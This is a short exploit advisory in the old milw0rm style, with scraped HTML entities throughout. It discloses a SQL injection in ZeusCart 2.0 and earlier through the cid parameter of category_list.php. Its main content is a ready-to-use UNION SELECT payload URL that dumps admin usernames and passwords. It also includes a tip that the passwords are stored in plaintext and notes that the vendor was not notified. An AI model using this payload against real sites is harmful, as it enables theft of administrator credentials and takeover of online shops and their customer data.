ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability

--==+================================================================================+==-- --==+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ZeusCart&nbsp;&lt;=&nbsp;2.0&nbsp;(category_list.php)&nbsp;Remote&nbsp;SQL&nbsp;Injection&nbsp;Vulnerbility&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;+==-- --==+================================================================================+==-- Discovered&nbsp;By:&nbsp;t0pP8uZz Discovered&nbsp;On:&nbsp;12&nbsp;MAY&nbsp;2008 Script&nbsp;Download:&nbsp;http://www.ajsquare.com/products/ecom/index.php?auc=1 DORK:&nbsp;N/A Vendor&nbsp;Has&nbsp;Not&nbsp;Been&nbsp;Notified! DESCRIPTION:&nbsp; ZeusCart&nbsp;(from&nbsp;AJ&nbsp;E-Commerce)&nbsp;suffers&nbsp;from&nbsp;a&nbsp;insecure&nbsp;mysql&nbsp;query,&nbsp;This&nbsp;allows&nbsp;the remote&nbsp;attacker&nbsp;to&nbsp;arbitrary&nbsp;execute&nbsp;mysql&nbsp;code/querys. the&nbsp;below&nbsp;injection&nbsp;will&nbsp;perform&nbsp;a&nbsp;SELECT&nbsp;query&nbsp;which&nbsp;will&nbsp;display&nbsp;admin&nbsp;credentials&nbsp;in&nbsp;RED&nbsp;text. SQL&nbsp;Injection: http://site.com/category_list.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(user_name,char(58),password),2/**/FROM/**/admin/* NOTE/TIP:&nbsp; passwords&nbsp;are&nbsp;plaintext GREETZ:&nbsp;milw0rm.com,&nbsp;h4ck-y0u.org,&nbsp;CipherCrew&nbsp;! peace,&nbsp;t0pP8uZz --==+================================================================================+==-- --==+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ZeusCart&nbsp;&lt;=&nbsp;2.0&nbsp;(category_list.php)&nbsp;Remote&nbsp;SQL&nbsp;Injection&nbsp;Vulnerbility&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;+==-- --==+================================================================================+==--